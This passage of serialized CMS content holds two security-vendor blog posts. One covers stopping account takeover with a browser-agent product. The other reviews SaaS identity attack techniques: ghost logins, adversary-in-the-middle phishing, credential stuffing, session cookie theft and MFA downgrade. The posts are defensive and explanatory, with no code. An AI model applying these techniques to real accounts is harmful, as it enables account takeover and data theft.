platform.",[],{},{"nodeType":312,"data":196658,"content":196662},{"target":196659},{"sys":196660},{"id":196661,"type":317,"linkType":318},"4t1PHxzadoTBjtJua6dzuJ",[],{"nodeType":178,"data":196664,"content":196665},{},[196666],{"nodeType":173,"value":196667,"marks":196668,"data":196669},"You can then use Push to enforce MFA on employee accounts, or present them with in-browser guidance requesting that they enable it themselves.  ",[],{},{"nodeType":312,"data":196671,"content":196675},{"target":196672},{"sys":196673},{"id":196674,"type":317,"linkType":318},"3JSTEJGtLT0hfwnkpLRP4K",[],{"nodeType":235,"data":196677,"content":196678},{},[196679],{"nodeType":173,"value":196680,"marks":196681,"data":196682},"Prevent multiple accounts being compromised by credential stuffing due to password reuse",[],{},{"nodeType":178,"data":196684,"content":196685},{},[196686],{"nodeType":173,"value":196687,"marks":196688,"data":196689},"The credential stuffing tools that attackers use will target a long list of popular business apps. If a password is reused across multiple apps and is breached, the blast radius is naturally increased – the attacker will be able to hijack multiple accounts, across numerous business applications.",[],{},{"nodeType":178,"data":196691,"content":196692},{},[196693],{"nodeType":173,"value":196694,"marks":196695,"data":196696},"Push detects when employees are trying to use the same password across multiple apps. When this happens, you can request that they change their password.",[],{},{"nodeType":312,"data":196698,"content":196702},{"target":196699},{"sys":196700},{"id":196701,"type":317,"linkType":318},"7ARHp2JPiHeKRYHwa2jwIZ",[],{"nodeType":235,"data":196704,"content":196705},{},[196706],{"nodeType":173,"value":196707,"marks":196708,"data":196709},"Prevent password spraying breaches",[],{},{"nodeType":178,"data":196711,"content":196712},{},[196713],{"nodeType":173,"value":196714,"marks":196715,"data":196716},"To stop your employees’ accounts from being breached by password spraying attacks, Push checks every password to see if it is easily guessable for attackers.",[],{},{"nodeType":178,"data":196718,"content":196719},{},[196720],{"nodeType":173,"value":196721,"marks":196722,"data":196723},"To determine if a password is easily guessable, the Push browser agent automatically checks the password against:",[],{},{"nodeType":250,"data":196725,"content":196726},{},[196727,196737,196747],{"nodeType":254,"data":196728,"content":196729},{},[196730],{"nodeType":178,"data":196731,"content":196732},{},[196733],{"nodeType":173,"value":196734,"marks":196735,"data":196736},"A list of top 10,000 weak base passwords.",[],{},{"nodeType":254,"data":196738,"content":196739},{},[196740],{"nodeType":178,"data":196741,"content":196742},{},[196743],{"nodeType":173,"value":196744,"marks":196745,"data":196746},"Number and special character variations on these weak base passwords, for example: Password1! or January2022.",[],{},{"nodeType":254,"data":196748,"content":196749},{},[196750],{"nodeType":178,"data":196751,"content":196752},{},[196753],{"nodeType":173,"value":196754,"marks":196755,"data":196756},"Variations on these weak base passwords that replace letters with numerals (1337), for example: P455w0rd.",[],{},{"nodeType":178,"data":196758,"content":196759},{},[196760],{"nodeType":173,"value":196761,"marks":196762,"data":196763},"You can also add your own custom word list that employees and attackers will predictably try and use. Push will then stop those words being used as part of passwords.",[],{},{"nodeType":235,"data":196765,"content":196766},{},[196767],{"nodeType":173,"value":196768,"marks":196769,"data":196770},"Detect unauthorized sessions  ",[],{},{"nodeType":178,"data":196772,"content":196773},{},[196774],{"nodeType":173,"value":196775,"marks":196776,"data":196777},"Once you have enabled all the Push controls that prevent employees from creating and using accounts that can be easily compromised by credential stuffing and password spraying attacks, the next line of defense is to detect when accounts are taken over.",[],{},{"nodeType":178,"data":196779,"content":196780},{},[196781],{"nodeType":173,"value":196782,"marks":196783,"data":196784},"Push uses its browser agent to inject a unique marker into the user agent string of sessions that occur in browsers enrolled in Push. You then add the list of domains that you want to have injected with the session marker. ",[],{},{"nodeType":178,"data":196786,"content":196787},{},[196788],{"nodeType":173,"value":196789,"marks":196790,"data":196791},"By analyzing logs from the IdP, you can identify activity from the same session that both has the Push marker and that lacks the marker. This indicates that the session is not being used by the legitimate user (your employees) in their usual work browser, and could be an attacker using their account. ",[],{},{"nodeType":235,"data":196793,"content":196794},{},[196795],{"nodeType":173,"value":196796,"marks":196797,"data":196798},"Reduce your identity attack surface",[],{},{"nodeType":178,"data":196800,"content":196801},{},[196802],{"nodeType":173,"value":196803,"marks":196804,"data":196805},"Finally, you’ll likely want to reduce your attack surface that can be targeted by credential stuffing. In other words, reduce the number of username and password accounts your employees have. ",[],{},{"nodeType":178,"data":196807,"content":196808},{},[196809],{"nodeType":173,"value":196810,"marks":196811,"data":196812},"There are a few ways that Push can help you do this.",[],{},{"nodeType":250,"data":196814,"content":196815},{},[196816,196831,196846],{"nodeType":254,"data":196817,"content":196818},{},[196819],{"nodeType":178,"data":196820,"content":196821},{},[196822,196827],{"nodeType":173,"value":196823,"marks":196824,"data":196826},"Block access to unapproved apps",[196825],{"type":370},{},{"nodeType":173,"value":196828,"marks":196829,"data":196830},". Using Push, you can create a block list of apps that you don’t want your users to create accounts and identities on.",[],{},{"nodeType":254,"data":196832,"content":196833},{},[196834],{"nodeType":178,"data":196835,"content":196836},{},[196837,196842],{"nodeType":173,"value":196838,"marks":196839,"data":196841},"Use app banners to stop users from creating local accounts",[196840],{"type":370},{},{"nodeType":173,"value":196843,"marks":196844,"data":196845},". When an employee goes to sign up to an app, Push will present an app banner that tells them to use their SSO identity and not to create a username and password account.",[],{},{"nodeType":254,"data":196847,"content":196848},{},[196849],{"nodeType":178,"data":196850,"content":196851},{},[196852,196857],{"nodeType":173,"value":196853,"marks":196854,"data":196856},"Get existing accounts and apps behind SSO",[196855],{"type":370},{},{"nodeType":173,"value":196858,"marks":196859,"data":196860},". Push shows you how your employees are logging in to every account on every app, including whether they’re using SAML or OIDC SSO. Armed with this data, you can get your employees to use your preferred SSO solution on the apps where it’s already available, and look into whether other popular apps being used in the business offer SSO.",[],{},{"nodeType":312,"data":196862,"content":196866},{"target":196863},{"sys":196864},{"id":196865,"type":317,"linkType":318},"3y8L55hbcQaRYPCdYYb3xA",[],{"nodeType":169,"data":196868,"content":196869},{},[196870],{"nodeType":173,"value":196871,"marks":196872,"data":196873},"Stop account takeover at the push of a button",[],{},{"nodeType":178,"data":196875,"content":196876},{},[196877,196881,196888,196892,196897,196900,196905,196909,196913],{"nodeType":173,"value":196878,"marks":196879,"data":196880},"We’ve described a lot of controls in this article. The good news is that they’re all pre-configured on the the ",[],{},{"nodeType":186,"data":196882,"content":196884},{"uri":196883},"https://pushsecurity.com/help/audience/administrators/docs/manage-security-controls/#start",[196885],{"nodeType":173,"value":18649,"marks":196886,"data":196887},[],{},{"nodeType":173,"value":196889,"marks":196890,"data":196891}," page in the Push platform. When you get started with Push, you can simply turn on all the controls you want, and decide whether you want them to work in ",[],{},{"nodeType":173,"value":196893,"marks":196894,"data":196896},"monitor",[196895],{"type":370},{},{"nodeType":173,"value":2936,"marks":196898,"data":196899},[],{},{"nodeType":173,"value":196901,"marks":196902,"data":196904},"warn",[196903],{"type":370},{},{"nodeType":173,"value":196906,"marks":196907,"data":196908}," mode or ",[],{},{"nodeType":173,"value":138,"marks":196910,"data":196912},[196911],{"type":370},{},{"nodeType":173,"value":196914,"marks":196915,"data":196916}," mode.    ",[],{},{"nodeType":312,"data":196918,"content":196922},{"target":196919},{"sys":196920},{"id":196921,"type":317,"linkType":318},"6FCuO78yQMNZvkcbcALmis",[],{"nodeType":235,"data":196924,"content":196925},{},[196926],{"nodeType":173,"value":196927,"marks":196928,"data":196929},"See it for yourself",[],{},{"nodeType":178,"data":196931,"content":196932},{},[196933,196937,196943],{"nodeType":173,"value":196934,"marks":196935,"data":196936},"To learn more, ",[],{},{"nodeType":186,"data":196938,"content":196939},{"uri":473},[196940],{"nodeType":173,"value":88194,"marks":196941,"data":196942},[],{},{"nodeType":173,"value":196944,"marks":196945,"data":196946},". We’ll be happy to show you these features, along with how we discover all the apps your employees are using, even the ones not behind SSO.",[],{},{"nodeType":312,"data":196948,"content":196952},{"target":196949},{"sys":196950},{"id":196951,"type":317,"linkType":318},"4IRtR9zicpB7lXdz2RvIlK",[],{"nodeType":178,"data":196954,"content":196955},{},[196956],{"nodeType":173,"value":37,"marks":196957,"data":196958},[],{},"Hackers don’t hack in, they log in: How to prevent account takeover with Push","How Push stops attackers from using identity attack tools and techniques to compromise your employee user accounts. ","2024-08-19T00:00:00.000Z","how-to-prevent-account-takeover-with-push",{"items":196964},[196965,196967],{"sys":196966,"name":509},{"id":508},{"sys":196968,"name":505},{"id":504},{"items":196970},[196971],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":196972},{"url":516},{"__typename":1528,"sys":196974,"content":196976,"title":198018,"synopsis":198019,"hashTags":118,"publishedDate":198020,"slug":198021,"tagsCollection":198022,"authorsCollection":198028},{"id":196975},"1LxqUNZpD2VynzSqbv719Z",{"json":196977},{"data":196978,"content":196979,"nodeType":165},{},[196980,196998,197005,197012,197019,197026,197029,197036,197118,197125,197132,197139,197154,197173,197180,197183,197190,197197,197203,197220,197244,197251,197258,197289,197320,197327,197345,197352,197359,197366,197374,197381,197410,197417,197434,197466,197473,197491,197498,197504,197522,197529,197536,197539,197546,197553,197560,197563,197570,197577,197584,197603,197732,197739,197742,197749,197756,197857,197864,197871,197874,197881,197888,197938,197945,197952,197955,197961,197968,197987,198006,198012],{"data":196981,"content":196982,"nodeType":178},{},[196983,196987,196994],{"data":196984,"marks":196985,"value":196986,"nodeType":173},{},[],"When we created the ",{"data":196988,"content":196989,"nodeType":186},{"uri":88239},[196990],{"data":196991,"marks":196992,"value":88742,"nodeType":173},{},[196993],{"type":194},{"data":196995,"marks":196996,"value":196997,"nodeType":173},{},[],", we made a conscious break away from the endpoint-focused techniques captured in industry resources like the MITRE ATT&CK Framework. ",{"data":196999,"content":197000,"nodeType":178},{},[197001],{"data":197002,"marks":197003,"value":197004,"nodeType":173},{},[],"At the time, we were anticipating a shift that was yet to fully materialize. But, a lot can change (and has changed) in the space of a year. We’ve seen the impact of SaaS account takeover attacks laid bare. Snowflake, billed one of the biggest breaches in history, is a telling example that we’ll no doubt look back on as a watershed moment. ",{"data":197006,"content":197007,"nodeType":178},{},[197008],{"data":197009,"marks":197010,"value":197011,"nodeType":173},{},[],"It isn’t an exaggeration or marketing fluff to say that identity attacks are the #1 threat facing organizations today. SaaS apps, and the identities that are used to access them, are clearly the weakest link – and therefore the lowest-hanging fruit for attackers to reach for. ",{"data":197013,"content":197014,"nodeType":178},{},[197015],{"data":197016,"marks":197017,"value":197018,"nodeType":173},{},[],"This makes resources like the SaaS attack matrix more relevant than ever – both for red teams seeking to emulate the latest offensive techniques, and blue teams trying to defend against them. Understanding these techniques is essential for building effective defenses, and identifying where new platforms and controls are required to do so. ",{"data":197020,"content":197021,"nodeType":178},{},[197022],{"data":197023,"marks":197024,"value":197025,"nodeType":173},{},[],"Let’s take a look at what we’ve learned so far.",{"data":197027,"content":197028,"nodeType":231},{},[],{"data":197030,"content":197031,"nodeType":169},{},[197032],{"data":197033,"marks":197034,"value":197035,"nodeType":173},{},[],"Hot right now: Initial access techniques",{"data":197037,"content":197038,"nodeType":178},{},[197039,197043,197050,197053,197061,197064,197071,197074,197081,197084,197093,197097,197104,197107,197115],{"data":197040,"marks":197041,"value":197042,"nodeType":173},{},[],"The majority of techniques we've seen rise to prominence in 2023/4 sit predominantly in the initial access phase. Since the matrix first launched, we’ve added more techniques to initial access than any other category, including ",{"data":197044,"content":197045,"nodeType":186},{"uri":832},[197046],{"data":197047,"marks":197048,"value":835,"nodeType":173},{},[197049],{"type":194},{"data":197051,"marks":197052,"value":2936,"nodeType":173},{},[],{"data":197054,"content":197055,"nodeType":186},{"uri":114964},[197056],{"data":197057,"marks":197058,"value":197060,"nodeType":173},{},[197059],{"type":194},"AitM phishing",{"data":197062,"marks":197063,"value":2936,"nodeType":173},{},[],{"data":197065,"content":197066,"nodeType":186},{"uri":114992},[197067],{"data":197068,"marks":197069,"value":175120,"nodeType":173},{},[197070],{"type":194},{"data":197072,"marks":197073,"value":2936,"nodeType":173},{},[],{"data":197075,"content":197076,"nodeType":186},{"uri":61157},[197077],{"data":197078,"marks":197079,"value":71405,"nodeType":173},{},[197080],{"type":194},{"data":197082,"marks":197083,"value":9534,"nodeType":173},{},[],{"data":197085,"content":197087,"nodeType":186},{"uri":197086},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/guest_access_abuse/description.md",[197088],{"data":197089,"marks":197090,"value":197092,"nodeType":173},{},[197091],{"type":194},"guest access abuse,",{"data":197094,"marks":197095,"value":197096,"nodeType":173},{},[]," all of which are methods of account takeover – complementing the classics like ",{"data":197098,"content":197099,"nodeType":186},{"uri":184680},[197100],{"data":197101,"marks":197102,"value":182807,"nodeType":173},{},[197103],{"type":194},{"data":197105,"marks":197106,"value":933,"nodeType":173},{},[],{"data":197108,"content":197110,"nodeType":186},{"uri":197109},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/email_phishing/description.md",[197111],{"data":197112,"marks":197113,"value":197114,"nodeType":173},{},[],"email phishing",{"data":197116,"marks":197117,"value":1477,"nodeType":173},{},[],{"data":197119,"content":197120,"nodeType":178},{},[197121],{"data":197122,"marks":197123,"value":197124,"nodeType":173},{},[],"We’ll spend a bit of time delving into these techniques in the next section, but let’s first consider what this tells us about SaaS attacks. ",{"data":197126,"content":197127,"nodeType":235},{},[197128],{"data":197129,"marks":197130,"value":197131,"nodeType":173},{},[],"Identity attacks are the leading cause of SaaS breaches",{"data":197133,"content":197134,"nodeType":178},{},[197135],{"data":197136,"marks":197137,"value":197138,"nodeType":173},{},[],"The initial identity attack designed to achieve account takeover is the most important part of the SaaS attack chain. The fact that attackers are focused on finding new ways of compromising identities illustrates the value, but also the fragility of the identity controls that most organizations are relying on (which may also be one of the reasons attackers are fixated on it). Whether we’re talking about anti-phishing protections, conditional access policies, or MFA – attackers are continually finding new ways of getting around them.",{"data":197140,"content":197141,"nodeType":178},{},[197142,197146,197151],{"data":197143,"marks":197144,"value":197145,"nodeType":173},{},[],"And, if all an attacker really needs to do to cause harm is log into an app and abuse its legitimate features and functions, there really is no margin for error – you need to successfully stop the initial identity attack ",{"data":197147,"marks":197148,"value":197150,"nodeType":173},{},[197149],{"type":370},"every time",{"data":197152,"marks":197153,"value":2340,"nodeType":173},{},[],{"data":197155,"content":197156,"nodeType":178},{},[197157,197161,197169],{"data":197158,"marks":197159,"value":197160,"nodeType":173},{},[],"You can’t rely on your endpoint and network controls to catch them later like you used to. Equally, it’s unlikely that your CASB or DLP solution can stop a legitimate app using legitimate features like ",{"data":197162,"content":197163,"nodeType":186},{"uri":144083},[197164],{"data":197165,"marks":197166,"value":197168,"nodeType":173},{},[197167],{"type":194},"API-based workflows",{"data":197170,"marks":197171,"value":197172,"nodeType":173},{},[]," from sending data to attacker-controlled infrastructure. ",{"data":197174,"content":197175,"nodeType":178},{},[197176],{"data":197177,"marks":197178,"value":197179,"nodeType":173},{},[],"It’s a classic case of attackers only needing to win once. And right now, it’s a numbers game that they’re winning enough to keep them coming back for more. ",{"data":197181,"content":197182,"nodeType":231},{},[],{"data":197184,"content":197185,"nodeType":169},{},[197186],{"data":197187,"marks":197188,"value":197189,"nodeType":173},{},[],"Most wanted: Techniques gaining notoriety in the wild",{"data":197191,"content":197192,"nodeType":178},{},[197193],{"data":197194,"marks":197195,"value":197196,"nodeType":173},{},[],"Let’s take a closer look at some of the techniques we’ve seen rise to prominence in 2023/4. ",{"data":197198,"content":197199,"nodeType":235},{},[197200],{"data":197201,"marks":197202,"value":26529,"nodeType":173},{},[],{"data":197204,"content":197205,"nodeType":178},{},[197206,197209,197216],{"data":197207,"marks":197208,"value":37,"nodeType":173},{},[],{"data":197210,"content":197211,"nodeType":186},{"uri":832},[197212],{"data":197213,"marks":197214,"value":26529,"nodeType":173},{},[197215],{"type":194},{"data":197217,"marks":197218,"value":197219,"nodeType":173},{},[]," is a technique that exploits the fact that SaaS user accounts often enable multiple simultaneous logins using different sign-in methods. ",{"data":197221,"content":197222,"nodeType":178},{},[197223,197227,197232,197235,197240],{"data":197224,"marks":197225,"value":197226,"nodeType":173},{},[],"Ghost logins can be used for both the ",{"data":197228,"marks":197229,"value":197231,"nodeType":173},{},[197230],{"type":370},"initial access",{"data":197233,"marks":197234,"value":933,"nodeType":173},{},[],{"data":197236,"marks":197237,"value":197239,"nodeType":173},{},[197238],{"type":370},"persistence",{"data":197241,"marks":197242,"value":197243,"nodeType":173},{},[]," stages of a cyber attack, doubling up as a defense evasion technique because of low login method visibility.",{"data":197245,"content":197246,"nodeType":178},{},[197247],{"data":197248,"marks":197249,"value":197250,"nodeType":173},{},[],"For initial access, the technique exploits the fact that local and SSO logins can exist simultaneously. Given that many apps are self-adopted by users, it’s likely that many users will default to a local username and password login at this stage. If the app is later adopted companywide and brought into SSO, the original local login will continue to exist unless explicitly disabled or deleted. ",{"data":197252,"content":197253,"nodeType":178},{},[197254],{"data":197255,"marks":197256,"value":197257,"nodeType":173},{},[],"Because MFA is applied at the app and IdP level independently, it is possible to end up with an SSO login that requires MFA (via the IdP login), but a local login that does not. This creates an easy target identity for attackers to look for. When combined with other identity vulnerabilities such as weak, breached, and/or reused passwords, attackers can easily automate ghost login discovery and exploitation at scale.  ",{"data":197259,"content":197260,"nodeType":178},{},[197261,197265,197273,197277,197285],{"data":197262,"marks":197263,"value":197264,"nodeType":173},{},[],"We saw the impact of ghost logins for initial access with ",{"data":197266,"content":197267,"nodeType":186},{"uri":74621},[197268],{"data":197269,"marks":197270,"value":197272,"nodeType":173},{},[197271],{"type":194},"the recent ShinyHunters campaign against Snowflake customers",{"data":197274,"marks":197275,"value":197276,"nodeType":173},{},[],". Because Snowflake accounts did not require mandatory MFA for accounts, or give admins the ability to enforce MFA by default, attackers were able to find and exploit a large number of Snowflake accounts using breached credentials from historical data breach dumps. Much of the industry response focused on ensuring SSO and MFA were deployed, but ",{"data":197278,"content":197279,"nodeType":186},{"uri":184425},[197280],{"data":197281,"marks":197282,"value":197284,"nodeType":173},{},[197283],{"type":194},"the practicalities of gathering data and manually unsetting local passwords in Snowflake",{"data":197286,"marks":197287,"value":197288,"nodeType":173},{},[]," meant that ghost logins were easy to overlook by organizations responding to the attacks.   ",{"data":197290,"content":197291,"nodeType":178},{},[197292,197296,197304,197308,197316],{"data":197293,"marks":197294,"value":197295,"nodeType":173},{},[],"Ghost logins can also be created after an attacker has established access to an app. For example, if a social login is used to access an account, an adversary may be able to configure a separate username/password login, or even (though much less commonly) connect a second social account that the adversary controls. If the account has sufficient privileges, it may also be possible to ",{"data":197297,"content":197298,"nodeType":186},{"uri":70029},[197299],{"data":197300,"marks":197301,"value":197303,"nodeType":173},{},[197302],{"type":194},"set up or change the SAML login settings to inject a malicious URL",{"data":197305,"marks":197306,"value":197307,"nodeType":173},{},[]," (for example to an attacker controlled tenant) or simply ",{"data":197309,"content":197310,"nodeType":186},{"uri":59347},[197311],{"data":197312,"marks":197313,"value":197315,"nodeType":173},{},[197314],{"type":194},"configure API access",{"data":197317,"marks":197318,"value":197319,"nodeType":173},{},[]," to forgo the need to log in entirely. ",{"data":197321,"content":197322,"nodeType":235},{},[197323],{"data":197324,"marks":197325,"value":197326,"nodeType":173},{},[],"AitM phishing ",{"data":197328,"content":197329,"nodeType":178},{},[197330,197333,197341],{"data":197331,"marks":197332,"value":37,"nodeType":173},{},[],{"data":197334,"content":197335,"nodeType":186},{"uri":114964},[197336],{"data":197337,"marks":197338,"value":197340,"nodeType":173},{},[197339],{"type":194},"Adversary-in-the-Middle (AitM) phishing",{"data":197342,"marks":197343,"value":197344,"nodeType":173},{},[]," is a newer variant of phishing that uses dedicated tooling to act as a web proxy between the victim and a legitimate login portal for an application the victim has access to, principally to make it easier to defeat MFA protection (with the victim responding to the MFA request as part of the attack).",{"data":197346,"content":197347,"nodeType":178},{},[197348],{"data":197349,"marks":197350,"value":197351,"nodeType":173},{},[],"As it’s a proxy to the real application, the page will appear exactly as the user expects, because they are logging into the legitimate site – just taking a detour via the attacker’s device. For example, if accessing their webmail, the user will see all their real emails; if accessing their cloud file store then all their real files will be present, etc. ",{"data":197353,"content":197354,"nodeType":178},{},[197355],{"data":197356,"marks":197357,"value":197358,"nodeType":173},{},[],"This gives AitM an increased sense of authenticity and makes the compromise less obvious to the user. Because the attacker is sitting in the middle of this connection, they are able to observe all interactions and take control of the authenticated session. ",{"data":197360,"content":197361,"nodeType":178},{},[197362],{"data":197363,"marks":197364,"value":197365,"nodeType":173},{},[],"Alongside AitM phishing is Browser-in-the-Middle (BitM), really a form of sub-technique. Rather than act as a reverse web proxy, this technique tricks a target into directly controlling the attacker’s own browser remotely using desktop screen sharing and control approaches (such as VNC and RDP). ",{"data":197367,"content":197368,"nodeType":178},{},[197369],{"data":197370,"marks":197371,"value":197373,"nodeType":173},{},[197372],{"type":370},"This is the virtual equivalent of an attacker handing their laptop to their victim, asking them to login to Okta for them, and then taking their laptop back afterwards.",{"data":197375,"content":197376,"nodeType":178},{},[197377],{"data":197378,"marks":197379,"value":197380,"nodeType":173},{},[],"A growing majority of modern phishing attacks typically leverage AitM or BitM tooling – they are now the standard choice for threat actors, offering the ability to bypass MFA without any real tradeoff. ",{"data":197382,"content":197383,"nodeType":178},{},[197384,197388,197396,197399,197407],{"data":197385,"marks":197386,"value":197387,"nodeType":173},{},[],"For more information you can ",{"data":197389,"content":197390,"nodeType":186},{"uri":49844},[197391],{"data":197392,"marks":197393,"value":197395,"nodeType":173},{},[197394],{"type":194},"read our recent blog post",{"data":197397,"marks":197398,"value":1464,"nodeType":173},{},[],{"data":197400,"content":197401,"nodeType":186},{"uri":196248},[197402],{"data":197403,"marks":197404,"value":197406,"nodeType":173},{},[197405],{"type":194},"watch our on-demand webinar on Phishing 2.0 to see AitM and BitM tools like Evilginx and EvilnoVNC in action",{"data":197408,"marks":197409,"value":197,"nodeType":173},{},[],{"data":197411,"content":197412,"nodeType":235},{},[197413],{"data":197414,"marks":197415,"value":197416,"nodeType":173},{},[],"Credential stuffing",{"data":197418,"content":197419,"nodeType":178},{},[197420,197423,197430],{"data":197421,"marks":197422,"value":37,"nodeType":173},{},[],{"data":197424,"content":197425,"nodeType":186},{"uri":184680},[197426],{"data":197427,"marks":197428,"value":197416,"nodeType":173},{},[197429],{"type":194},{"data":197431,"marks":197432,"value":197433,"nodeType":173},{},[]," attacks continue to pose a risk to organizations. Despite the fact that MFA has now become an expected control, accounts without MFA continue to be hacked as a result of using weak, reused, and/or previously breached credentials. ",{"data":197435,"content":197436,"nodeType":178},{},[197437,197441,197450,197454,197463],{"data":197438,"marks":197439,"value":197440,"nodeType":173},{},[],"Credential stuffing is being fed by an increase in the number of ",{"data":197442,"content":197444,"nodeType":186},{"uri":197443},"https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/?utm_source=ebook&utm_medium=organic",[197445],{"data":197446,"marks":197447,"value":197449,"nodeType":173},{},[197448],{"type":194},"infostealer",{"data":197451,"marks":197452,"value":197453,"nodeType":173},{},[]," attacks designed to harvest credentials to be sold on criminal marketplaces. Infostealers have been boosted by the success of the Snowflake attacks (",{"data":197455,"content":197457,"nodeType":186},{"uri":197456},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/#id-snowflake-june-2024?utm_source=ebook&utm_medium=organic",[197458],{"data":197459,"marks":197460,"value":197462,"nodeType":173},{},[197461],{"type":194},"where 80% of the credentials used to access accounts could be traced back to infostealer infections dating back to 2020",{"data":197464,"marks":197465,"value":1771,"nodeType":173},{},[],{"data":197467,"content":197468,"nodeType":235},{},[197469],{"data":197470,"marks":197471,"value":197472,"nodeType":173},{},[],"Session cookie theft",{"data":197474,"content":197475,"nodeType":178},{},[197476,197479,197487],{"data":197477,"marks":197478,"value":59160,"nodeType":173},{},[],{"data":197480,"content":197481,"nodeType":186},{"uri":114992},[197482],{"data":197483,"marks":197484,"value":197486,"nodeType":173},{},[197485],{"type":194},"targeting session cookies",{"data":197488,"marks":197489,"value":197490,"nodeType":173},{},[]," to be able to hijack live user sessions as a means of getting around MFA. Although session cookies are predominantly stolen via infostealers, techniques like AitM and BitM phishing described above are also methods of stealing session cookies and hijacking sessions.",{"data":197492,"content":197493,"nodeType":178},{},[197494],{"data":197495,"marks":197496,"value":197497,"nodeType":173},{},[],"While the majority of infostealer data dumps result in credential stuffing attacks rather than session hijacking, as the infostealer marketplace continues to heat up, it’s likely that more instances of session cookie theft will be the cause of breaches going forward. ",{"data":197499,"content":197500,"nodeType":235},{},[197501],{"data":197502,"marks":197503,"value":114939,"nodeType":173},{},[],{"data":197505,"content":197506,"nodeType":178},{},[197507,197511,197518],{"data":197508,"marks":197509,"value":197510,"nodeType":173},{},[],"While many organizations are waking up to the fact that it’s not enough to have any old MFA method, it’s still often overlooked that you need to actually remove or disable the phishable methods. Otherwise, in many cases they remain valid, opening affected identities up to ",{"data":197512,"content":197513,"nodeType":186},{"uri":61157},[197514],{"data":197515,"marks":197516,"value":114939,"nodeType":173},{},[197517],{"type":194},{"data":197519,"marks":197520,"value":197521,"nodeType":173},{},[]," attacks. ",{"data":197523,"content":197524,"nodeType":178},{},[197525],{"data":197526,"marks":197527,"value":197528,"nodeType":173},{},[],"Just because a user has a phishing-resistant factor setup (such as passkeys) and may use them by default, it does not mean they are necessarily enforced. Often, services support the use of multiple authentication options, particularly for second factors. In particular, passkeys are device-bound and so enforcing their use prevents logins from other devices and can cause recovery issues in a lost/broken device scenario. Therefore, it’s common for the default case to be that passkey authentication is optional, rather than required.",{"data":197530,"content":197531,"nodeType":178},{},[197532],{"data":197533,"marks":197534,"value":197535,"nodeType":173},{},[],"When used in combination with AitM phishing tools, it’s possible for attackers to modify requests/responses so as to prevent the ability of passkeys to be selected as a login option and prompting the user to use vulnerable factors, such as passwords, TOTPs and push notifications instead. Since the server-side supports other authentication options, if the user continues and enters one of these alternative factors then their authenticated session will be compromised – despite the fact they usually use phishing-resistant MFA methods like passkeys or similar.",{"data":197537,"content":197538,"nodeType":231},{},[],{"data":197540,"content":197541,"nodeType":169},{},[197542],{"data":197543,"marks":197544,"value":197545,"nodeType":173},{},[],"Use case inspo: How red teamers are using the SaaS attack matrix",{"data":197547,"content":197548,"nodeType":178},{},[197549],{"data":197550,"marks":197551,"value":197552,"nodeType":173},{},[],"The techniques that advanced red teams are using to (ethically) hack into their clients are always a good indicator of what direction hackers in the real world are headed.  ",{"data":197554,"content":197555,"nodeType":178},{},[197556],{"data":197557,"marks":197558,"value":197559,"nodeType":173},{},[],"We spoke to a few of the best red teams around to see how they are using the matrix: Let’s see what they had to say. ",{"data":197561,"content":197562,"nodeType":231},{},[],{"data":197564,"content":197565,"nodeType":235},{},[197566],{"data":197567,"marks":197568,"value":197569,"nodeType":173},{},[],"Rob Maslen | Managing Principal Consultant | MDSec",{"data":197571,"content":197572,"nodeType":178},{},[197573],{"data":197574,"marks":197575,"value":197576,"nodeType":173},{},[],"“We use the matrix throughout our engagements: When scoping and proposing projects to clients, during testing to assist our consultants in successfully utilizing novel SaaS-attack techniques, and for reporting to provide a common language across the vendors that they work with. ",{"data":197578,"content":197579,"nodeType":178},{},[197580],{"data":197581,"marks":197582,"value":197583,"nodeType":173},{},[],"It’s been most useful to us when performing engagements on more modern Zero Trust Environments where macOS is predominantly the Operating System of choice. The objectives tend to be either access to critical applications that reside within the cloud and require the compromise of SaaS credentials, or to gain privileged access to a SaaS application. Whilst resources like the MITRE ATT&CK Framework can help to describe the techniques that have been used against a more traditional environment, the SaaS Matrix aids with performing and describing attacks against a more modern infrastructure.  ",{"data":197585,"content":197586,"nodeType":178},{},[197587,197591,197599],{"data":197588,"marks":197589,"value":197590,"nodeType":173},{},[],"The technique we’ve seen most success with, across both traditional Active Directory attacks and more modern Zero Trust Environments, is ",{"data":197592,"content":197593,"nodeType":186},{"uri":114992},[197594],{"data":197595,"marks":197596,"value":197598,"nodeType":173},{},[197597],{"type":194},"Session Cookie Theft",{"data":197600,"marks":197601,"value":197602,"nodeType":173},{},[],". The protection of browser cookies (for inexplicable reasons) has had less engineering attention than it should have, opening up opportunities for lateral movement using session cookies, credentials, or API keys recovered from a host becomes a key technique. In our experience defensive tooling has yet to catch up with this threat. ",{"data":197604,"content":197605,"nodeType":178},{},[197606,197610,197618,197621,197630,197633,197642,197645,197652,197655,197662,197665,197673,197676,197683,197686,197695,197698,197705,197709,197718,197721,197729],{"data":197607,"marks":197608,"value":197609,"nodeType":173},{},[],"We’ve also seen success with various techniques across Kill Chain stages, including ",{"data":197611,"content":197612,"nodeType":186},{"uri":184315},[197613],{"data":197614,"marks":197615,"value":197617,"nodeType":173},{},[197616],{"type":194},"Subdomain tenant discovery",{"data":197619,"marks":197620,"value":2936,"nodeType":173},{},[],{"data":197622,"content":197624,"nodeType":186},{"uri":197623},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/dns_reconnaissance/description.md",[197625],{"data":197626,"marks":197627,"value":197629,"nodeType":173},{},[197628],{"type":194},"DNS reconnaissance",{"data":197631,"marks":197632,"value":2936,"nodeType":173},{},[],{"data":197634,"content":197636,"nodeType":186},{"uri":197635},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/username_enumeration/description.md",[197637],{"data":197638,"marks":197639,"value":197641,"nodeType":173},{},[197640],{"type":194},"username enumeration",{"data":197643,"marks":197644,"value":2936,"nodeType":173},{},[],{"data":197646,"content":197647,"nodeType":186},{"uri":19838},[197648],{"data":197649,"marks":197650,"value":8091,"nodeType":173},{},[197651],{"type":194},{"data":197653,"marks":197654,"value":2936,"nodeType":173},{},[],{"data":197656,"content":197657,"nodeType":186},{"uri":9275},[197658],{"data":197659,"marks":197660,"value":1812,"nodeType":173},{},[197661],{"type":194},{"data":197663,"marks":197664,"value":2936,"nodeType":173},{},[],{"data":197666,"content":197667,"nodeType":186},{"uri":197086},[197668],{"data":197669,"marks":197670,"value":197672,"nodeType":173},{},[197671],{"type":194},"guest access 